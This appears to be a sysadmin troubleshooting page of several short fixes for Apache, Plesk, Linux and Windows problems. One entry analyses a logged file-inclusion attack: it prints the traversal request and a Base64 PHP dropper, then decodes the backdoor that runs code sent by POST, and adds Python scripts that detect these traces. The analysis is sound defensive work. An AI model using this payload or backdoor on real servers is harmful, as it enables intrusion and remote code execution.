Options FollowSymLinks or SymLinksIfOwnerMatch is off which implies that RewriteRule directive is forbidden

Symptoms: Options FollowSymLinks or SymLinksIfOwnerMatch is off which implies that RewriteRule directive is forbidden

Either the .htaccess file is missing the FollowSymLinks option or another .htaccess file is overriding the options.

NOTE: There are TWO solutions to this problem; I recommend trying Solution #2 first.

Solution #1:

Add: 

Options FollowSymLinks

Above:
RewriteEngine On
RewriteBase /

(Note: you must have “AllowOverride Options” in effect to permit the use of the “Options” directive in .htaccess files.)

If you are trying to access a Perl file in a cgi-bin or other directory that does not require the rewrite rule, add an .htaccess file with RewriteEngine off. This will prevent the above error from occurring.

It is best to add this solution to the httpd.conf file if you have access. The how-to on that file can be found here:

http://httpd.apache.org/docs/current/howto/htaccess.html

Solution #2:

Modify the dir.conf in Apache.

Step 1: From root SSH: vi /etc/apache2/mods-enabled/dir.conf

Step 2: Change:

DirectoryIndex at_domains_index.html index.html index.cgi index.pl index.php index.xhtml index.htm index.shtml index.cfm

to:

DirectoryIndex at_domains_index.html index.html index.cgi index.php index.pl index.xhtml index.htm index.shtml index.cfm

A simple change in the order fixes the symlinks issue.

Special Thanks to XAMeLeOH for posting this for the community.


Connection reset by peer: mod_fcgid: error reading data from FastCGI server

Symptoms: The following errors are found in the web server error logs:

Connection reset by peer: mod_fcgid: error reading data from FastCGI server

Premature end of script headers: index.php

Solutions:  This is one of those frustrating errors that can take a long time to fix and may be dependent on multiple problems.  The solution that worked in my case was adding:

ini_set('zend.enable_gc', 0);  << place this directly below the <?php tag in index.php

Why does this work? There are known conflicts between Zend and APC. If both are installed you may receive the above error; adding the above code to your PHP file should resolve the issue.

Other possible solutions: Modify your php.ini to increase max_execution_time, post_max_size, and max_input_time. IMPORTANT: Make sure you maintain a limit; no limit could result in massive resource usage.


Plesk: Test Directory located in /httpdocs/test/

Description: In default Plesk installations a folder called Test is created under httpdocs/. This folder contains a series of scripts designed to perform “hello world” type tests to confirm that those scripting languages can be used.

If the test scripts are no longer needed, you can remove the directory.

If you would like to keep the scripts but prevent access to them, you can either:

1. chmod the directories to 700 and files to 644; or

2. Move the test folder out of the httpdocs/ directory into a non-web-accessible directory for later use.

 

/proc/self/environ Server Log – Hacking Attempt

Symptom: Web server logs show entries similar to “GET /index.php?inc=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0” 200 22702 “” ” ##php eval(base64_decode(\”YWRkTG9hZGVyKCk7DQokZGF0YSA9IEBvcGVuZGlyKCcuJyk7DQoNCndoaWxlICgkZmlsZSA9IEByZWFkZGlyKCRkYXRhKSkNCnsNCgkkZmlsZSA9IHRyaW0oJGZpbGUpOw0KCWlmICghJGZpbGUgfHwgcHJlZ19tYXRjaCgnL15cLiskLycsICRmaWxlKSB8fCAhaXNfZGlyKCRmaWxlKSkgY29udGludWU7DQoJYWRkTG9hZGVyKCRmaWxlKTsNCn0NCg0KQGNsb3NlZGlyKCRkYXRhKTsNCg0KZnVuY3Rpb24gYWRkTG9hZGVyKCRkaXIgPSAnJykNCnsNCiAgICBpZiAoJGRpcikgJGRpciAuPSAnLyc7DQogICAgQGNobW9kKCRkaXIsIDc3Nyk7DQogICAgDQogICAgJGZwID0gZm9wZW4oInskZGlyfWVkNjllZDYwYmU0ODViYTFkY2QwMDc3MzRiODM2Y2E4LnBocCIsICJ3Iik7IA0KICAgIGZ3cml0ZSgkZnAsIGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ2cwS1FHbHVhVjl6WlhRb0oyRnNiRzkzWDNWeWJGOW1iM0JsYmljc0lERXBPdzBLUUdsdWFWOXpaWFFvSjJSbFptRjFiSFJmYzI5amEyVjBYM1JwYldWdmRYUW5MQ0EyTUNrN0RRcEFhVzVwWDNObGRDZ25iV0Y0WDJWNFpXTjFkR2x2Ymw5MGFXMWxKeXdnTmpBcE93MEtRSE5sZEY5MGFXMWxYMnhwYldsMEtEWXdLVHNOQ2cwS0pHUmhkR0VnUFNCQWRXNXpaWEpwWVd4cGVtVW9ZbUZ6WlRZMFgyUmxZMjlrWlNoMGNtbHRLRUFrWDFCUFUxUmJKMlJoZEdFblhTa3BLVHNOQ2cwS2FXWWdLRUFoYVhOZllYSnlZWGtvSkdSaGRHRXBJSHg4SUcxa05TZ2taR0YwWVZzbmNHRnpjM2R2Y21RblhTa2dJVDBnSjJRelpHWTBNemxqTTJVMFlqSmpOREU1TWpCa09HVXlOek16TVRFek1qTTJKeWtnWlhocGREc05DbWxtSUNoQUpHUmhkR0ZiSjJOdlpHVW5YU2tnWlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSa1lYUmhXeWRqYjJSbEoxMHBLVHNOQ21sbUlDaEFKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YU2tnY0hKcGJuUWdKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YVHNOQ2cwS1B6ND0nKSk7DQoJZmNsb3NlKCRmcCk7DQoNCglpZiAoZmlsZV9leGlzdHMoInskZGlyfWVkNjllZDYwYmU0ODViYTFkY2QwMDc3MzRiODM2Y2E4LnBocCIpKQ0KCXsNCiAgICAgICAgJGNrID0gIjE4MjM2NDkzNjU4MjAzNTQiOw0KCSAgICBwcmludCAiJGNrOnsqfTokZGlyOnsqfToiOw0KCQlleGl0Ow0KCX0NCn0=\”)); ##”

Please note that the <? and > were removed for security reasons and replaced with ##

Description: This is a poisoned null byte attack, often conducted by bots. If the postfix (trailing) null byte is not handled correctly it can lead to an exploit in the system; this technique is called Local File Inclusion (LFI). In addition to the LFI, this version attempts to execute code by running a PHP statement that is encoded with Base64.

If this attack is successful, it will result in the inclusion of the /proc/self/environ file, or another requested file, instead of the originally requested file (index.php in this case). In addition, the PHP script, if run, will append its code to the original file and create a new file that will notify the hacker of success.

Let's delve a bit deeper here… Anything prefixed with ## is a comment I inserted into the code. The Base64 code within the eval statement translates to:

addLoader();
$data = @opendir(‘.’);  ## Open the current directory for reading

while ($file = @readdir($data))  ## Loop over every entry in that directory
{
$file = trim($file);
if (!$file || preg_match(‘/^\.+$/’, $file) || !is_dir($file)) continue;  ## Skip empty names, "." and "..", and anything that is not a directory
addLoader($file);
}

@closedir($data);

function addLoader($dir = ”)
{
if ($dir) $dir .= ‘/’;  ## Append a trailing slash to the directory name
@chmod($dir, 777); ## Try to make the directory world-accessible (777 is passed as a decimal, not the octal 0777 that chmod() expects)

$fp = fopen(“{$dir}ed69ed60be485ba1dcd007734b836ca8.php”, “w”);  ## Create the following file and write the contents to it
fwrite($fp, base64_decode(‘PD9waHANCg0KQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KQGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA2MCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgNjApOw0KQHNldF90aW1lX2xpbWl0KDYwKTsNCg0KJGRhdGEgPSBAdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZSh0cmltKEAkX1BPU1RbJ2RhdGEnXSkpKTsNCg0KaWYgKEAhaXNfYXJyYXkoJGRhdGEpIHx8IG1kNSgkZGF0YVsncGFzc3dvcmQnXSkgIT0gJ2QzZGY0MzljM2U0YjJjNDE5MjBkOGUyNzMzMTEzMjM2JykgZXhpdDsNCmlmIChAJGRhdGFbJ2NvZGUnXSkgZXZhbChiYXNlNjRfZGVjb2RlKCRkYXRhWydjb2RlJ10pKTsNCmlmIChAJGRhdGFbJ2NoZWNrX2NvZGUnXSkgcHJpbnQgJGRhdGFbJ2NoZWNrX2NvZGUnXTsNCg0KPz4=’));
fclose($fp); ## The contents written above are again encoded in Base64; the decoded form follows below

if (file_exists(“{$dir}ed69ed60be485ba1dcd007734b836ca8.php”))
{
$ck = “1823649365820354”;
print “$ck:{*}:$dir:{*}:”;
exit;
}
}

## Here is the decoded Base64 that fwrite() places in the new file

##php

@ini_set(‘allow_url_fopen’, 1);  ## Attempt to override the php.ini setting so that fopen() accepts URLs
@ini_set(‘default_socket_timeout’, 60);  ## Set the default socket timeout to 60 seconds
@ini_set(‘max_execution_time’, 60);
@set_time_limit(60);

$data = @unserialize(base64_decode(trim(@$_POST[‘data’])));

if (@!is_array($data) || md5($data[‘password’]) != ‘d3df439c3e4b2c41920d8e2733113236’) exit;
if (@$data[‘code’]) eval(base64_decode($data[‘code’]));  ## If code was supplied in the POST data, decode and execute it
if (@$data[‘check_code’]) print $data[‘check_code’];

##

Summary: If successful, this exploit will bypass your PHP settings, set one of your directories to world access, write a file with the above name (.php), and provide a backdoor to your server.
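To check whether the dropper decoded above left anything behind, the following added example (not part of the original post) sweeps a document root for its traces: a 32-hex-character .php file name, the POST-to-eval body, and world-writable directories. The function name sweep, the trait patterns and the 64 KiB read limit are assumptions of this sketch.

```python
import os
import re
import stat

# The dropper decoded above writes a 32-hex-character file name ending in .php.
HEX_NAME = re.compile(r"^[0-9a-f]{32}\.php$")
# Traits of the decoded backdoor body: POST data, unserialize(), eval(base64_decode()).
TRAITS = [re.compile(rb"\$_POST"), re.compile(rb"unserialize\s*\("),
          re.compile(rb"eval\s*\(\s*base64_decode")]

def sweep(docroot):
    """Return sorted (relative_path, reasons) for suspicious entries under docroot."""
    hits = []
    for base, dirs, files in os.walk(docroot):
        for d in dirs:
            path = os.path.join(base, d)
            # The dropper chmods each directory it visits; flag world-writable ones.
            if not os.path.islink(path) and os.stat(path).st_mode & stat.S_IWOTH:
                hits.append((os.path.relpath(path, docroot), ["world-writable-dir"]))
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(base, name)
            reasons = ["hex-named-php"] if HEX_NAME.match(name) else []
            try:
                with open(path, "rb") as fh:
                    body = fh.read(65536)  # the backdoor is tiny; 64 KiB is ample
            except OSError:
                body = b""  # unreadable: still report a name match
            if all(t.search(body) for t in TRAITS):
                reasons.append("post-to-eval")
            if reasons:
                hits.append((os.path.relpath(path, docroot), reasons))
    return sorted(hits)

if __name__ == "__main__":
    import sys
    for rel, why in sweep(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(rel, ",".join(why))
```

A name-only hit can be a legitimate cache file, so treat "hex-named-php" alone as a lead to review rather than proof of compromise.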

Solutions:

1. Consider using the mod_security add-on for Linux/Unix servers

2. Use .htaccess files to prevent this kind of exploit

3. Use a firewall program to prevent unwanted access

4. STAY UP TO DATE.
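As a complement to the blocking measures listed above, this added example (not part of the original post) flags the request pattern from the Symptom in an access log and decodes any embedded Base64 for reading, without executing it. The function name inspect, the finding labels and the two sample log lines are constructed for illustration; the log layout is assumed to be Apache combined format.

```python
import base64
import re
from urllib.parse import unquote

# Combined log format tail: "request" status size "referer" "user-agent"
LOG = re.compile(r'"(?P<req>[A-Z]+ \S+ HTTP/[\d.]+)" (?P<status>\d{3}) \S+ '
                 r'"(?P<ref>.*?)" "(?P<ua>.*)"$')
TRAVERSAL = re.compile(r"(?:\.\./){2,}")
# "##php" is how this page prints the opening PHP tag; real logs carry "<?php".
PHP_IN_HEADER = re.compile(r"(?:<\?|##)\s*php\b|eval\s*\(\s*base64_decode", re.I)
B64_ARG = re.compile(r"""base64_decode\(\\?["']([A-Za-z0-9+/=]+)""")

def inspect(line):
    """Return (findings, decoded_payload) for one access-log line."""
    m = LOG.search(line)
    if not m:
        return [], None
    target = unquote(m["req"].split(" ")[1])  # percent-decode once
    headers = m["ref"] + " " + m["ua"]
    findings = []
    if TRAVERSAL.search(target):
        findings.append("path-traversal")
    if "/proc/self/environ" in target.lower():
        findings.append("proc-self-environ")
    if "\x00" in target or "%00" in target:  # %00, or double-encoded %2500
        findings.append("null-byte")
    if PHP_IN_HEADER.search(headers):
        findings.append("php-in-header")
    if findings and m["status"] == "200":
        findings.append("served-200")  # request was not rejected: follow up
    payload = None
    b64 = B64_ARG.search(headers)
    if b64:
        try:  # decoded for reading only; the text is never evaluated
            payload = base64.b64decode(b64[1]).decode("utf-8", "replace")
        except ValueError:
            payload = None
    return findings, payload

# Constructed sample lines (documentation addresses, harmless payload).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2013:10:00:00 +0000] "GET /index.php?inc=../../../../proc/self/environ%00 HTTP/1.0" 200 22702 "" "##php eval(base64_decode(\\"cHJpbnQgInRlc3QiOw==\\")); ##"',
    '198.51.100.4 - - [01/Jan/2013:10:00:05 +0000] "GET /index.php?inc=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry))
```

A "served-200" finding only means the server answered normally; whether the include actually happened has to be confirmed on the file system.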


userdel (options) username

userdel is used in Unix / Linux systems to remove a user from the system.

Flags:

-h, --help: Display the help/man information and exit.

-r, --remove: This flag will remove the user’s home directory and associated mail. If the user is logged in or has processes running, this command will not work.

-f, --force: Force the removal of the user even if the user is logged in. This should only be used as a last resort as it could potentially damage your file systems.

SYNTAX: # userdel -r/-f/-h username.

 

Blue Screen of Death keycrypt64.sys

Symptoms: Computer is an HP Model that suddenly blue screens and returns an error with keycrypt64.sys before rebooting.

Items Needed: USB Mouse, USB Keyboard, Windows Boot Disk or Utility Disk

Solution: A recent update push to Constant Guard (Comcast) has a conflict with the default keyboard / mouse dll for HP Machines. This is a temporary fix.

Step 1. Boot the machine using the utility boot disk to access a command prompt.

Step 2. Copy C:\windows\system32\drivers\hpqkbfiltr.sys to C:\windows\system32\drivers\hpqkbfiltr.old (THIS WILL DISABLE YOUR KEYBOARD AND MOUSE THAT ARE NOT USB)

Step 3. Attach the USB keyboard and mouse to a side port and reboot the laptop. Windows should boot normally.

Step 4. Once logged into Windows, go to Control Panel, Add/Remove Programs and remove Comcast Constant Guard.

Step 5.  Reboot and use the USB Keyboard and mouse to rename C:\windows\system32\drivers\hpqkbfiltr.old to C:\windows\system32\drivers\hpqkbfiltr.sys

Step 6. Reboot and unplug the USB keyboard and mouse. The computer should be running fine.

Special Thanks to Bob Bailey for posting this solution for the community!

Plesk: Scheduled Task for script not running

Symptoms: A task is scheduled in Plesk under Scheduled Tasks, the task attempts to run a php script but fails.

Solution:
By default Plesk 11 does not allow execution of scripts in a non-chrooted environment.

To allow execution of scripts, change the server policy from the command prompt:

# /usr/local/psa/bin/server_pref -u -crontab-secure-shell "/bin/sh"

To disallow:
# /usr/local/psa/bin/server_pref -u -crontab-secure-shell ""

Windows: Microsoft Office Word, Excel, Powerpoint, Internet Explorer Close unexpectedly

Problem: Microsoft Office Word, Excel, Powerpoint, and Internet Explorer close unexpectedly on a regular basis in Vista. Crash report lists gdiplus.dll_unloaded as the module.

Solution:

1. gdiplus.dll_unloaded is in conflict with Apple iCloud. Uninstall the iCloud program and reboot the machine; this will correct the regular crashes.

2. If you want to maintain iCloud, open Windows Control Panel, find the iCloud control panel icon, open the control panel and allow iCloud to deploy fully to all of the programs on the affected computer. This will result in new icons appearing in Word and Excel.

3. If neither of the above solutions works, or if gdiplus.dll is not listed, try scanning the machine for malware.